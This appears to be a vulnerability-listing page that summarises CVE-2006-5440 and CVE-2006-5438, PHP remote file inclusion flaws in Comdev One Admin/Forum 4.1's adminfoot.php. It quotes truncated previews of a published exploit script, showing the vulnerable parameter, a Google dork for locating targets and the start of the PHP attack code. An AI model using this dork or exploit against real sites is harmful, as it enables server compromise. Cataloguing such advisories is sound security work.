EUVD-2006-5426

Malware in sbrugna...

CVE-2006-5440

The CVE-2006-5440 entry describes a PHP remote file inclusion in Comdev Form Designer 4.1, specifically in adminfoot.php. The root cause is the use of register_globals, enabling an attacker to supply a URL in the path[docroot] parameter to execute arbitrary PHP code on the server. This results in...

CVE-2006-5438

CVE-2006-5438 : PHP remote file inclusion in adminfoot.php of Comdev Forum 4.1 when register_globals is enabled. An attacker can supply a URL in the path[docroot] parameter to execute arbitrary PHP code remotely. The provided documents do not include explicit remediation steps. Exploitation statu...

CVE-2006-5438

PHP remote file inclusion vulnerability in adminfoot.php in Comdev Forum 4.1, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the pathdocroot parameter. NOTE: the provenance of this information is unknown; the details are obtained from third par...

Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution

Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution !/usr/bin/php //oneadmin/adminfoot.php?pathdocroot= Googledork: inurl:/oneadmin/ w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path command\n Usage Example: php $argv0 domain.com /dolphin/ whoami\n"; function send$host, $pu...

Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution

!/usr/bin/php //oneadmin/adminfoot.php?pathdocroot= Googledork: inurl:/oneadmin/ w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path command\n Usage Example: php $argv0 domain.com /dolphin/ whoami\n"; function send$host, $put global $data; $conn = fsockopen gethostbyname$host,"80" ;...